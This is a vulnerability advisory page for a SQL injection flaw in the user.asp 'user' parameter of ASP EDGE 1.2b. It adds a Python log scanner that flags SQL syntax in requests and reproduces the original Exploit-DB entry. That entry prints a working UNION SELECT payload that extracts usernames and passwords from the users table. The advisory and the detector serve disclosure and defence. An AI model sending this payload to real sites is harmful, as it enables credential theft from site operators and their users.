Vendor: ASP EDGE
By: ajann
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: ASP EDGE
Affected Version From: ASP EDGE version <= 1.2b
Affected Version To: ASP EDGE version <= 1.2b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability

The vulnerability allows a remote attacker to perform SQL injection by manipulating the 'user' parameter of the 'user.asp' file in ASP EDGE version 1.2b and earlier. An example request is included in the Exploit-DB raw data below.

Mitigation:

To mitigate the vulnerability, it is recommended to apply a patch or update to a version that is not affected.
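
Since the page lists no patch, one interim check is to review web server logs for SQL syntax in the 'user' parameter of user.asp. The following is an added example, not part of the original advisory; it assumes NCSA common log format, and the function name and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# SQL metacharacters and keywords that a plain user name should not contain.
# A legitimate name such as o'brien would also be flagged; review hits by hand.
SUSPICIOUS = re.compile(
    r"'|--|;|/\*|\b(union|select|insert|update|delete|drop|exec)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def flag_user_asp_requests(log_lines):
    """Return (line_number, decoded_value) for each request to user.asp
    whose 'user' parameter contains SQL syntax."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        # Split by hand: a target starting with "//" would be read as a
        # host name by urlsplit, and the advisory's URL uses "//user.asp".
        path, _, query = match.group(1).partition("?")
        if not path.lower().endswith("/user.asp"):
            continue
        # parse_qsl percent-decodes, so %27 and %20 are matched as ' and space.
        for name, value in parse_qsl(query, keep_blank_values=True):
            # ASP reads query string names case-insensitively.
            if name.lower() == "user" and SUSPICIOUS.search(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, hypothetical /edge path).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2007:10:00:01 +0000] '
    '"GET /edge/user.asp?user=alice HTTP/1.1" 200 512',
    '192.0.2.44 - - [24/Jan/2007:10:00:07 +0000] '
    '"GET /edge//user.asp?user=%27union%20select%20username%20from%20users HTTP/1.1" 200 2048',
    '192.0.2.10 - - [24/Jan/2007:10:00:09 +0000] '
    '"GET /edge/default.asp?user=o%27brien HTTP/1.1" 200 300',
    '192.0.2.51 - - [24/Jan/2007:10:00:12 +0000] '
    '"GET /edge/User.asp?USER=%27UNION+SELECT+password+FROM+users HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, value in flag_user_asp_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious user value {value!r}")
```
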
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//user.asp?user=[SQL]

Example:

//user.asp?user='union%20select%20username,0,username,0,password,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-24]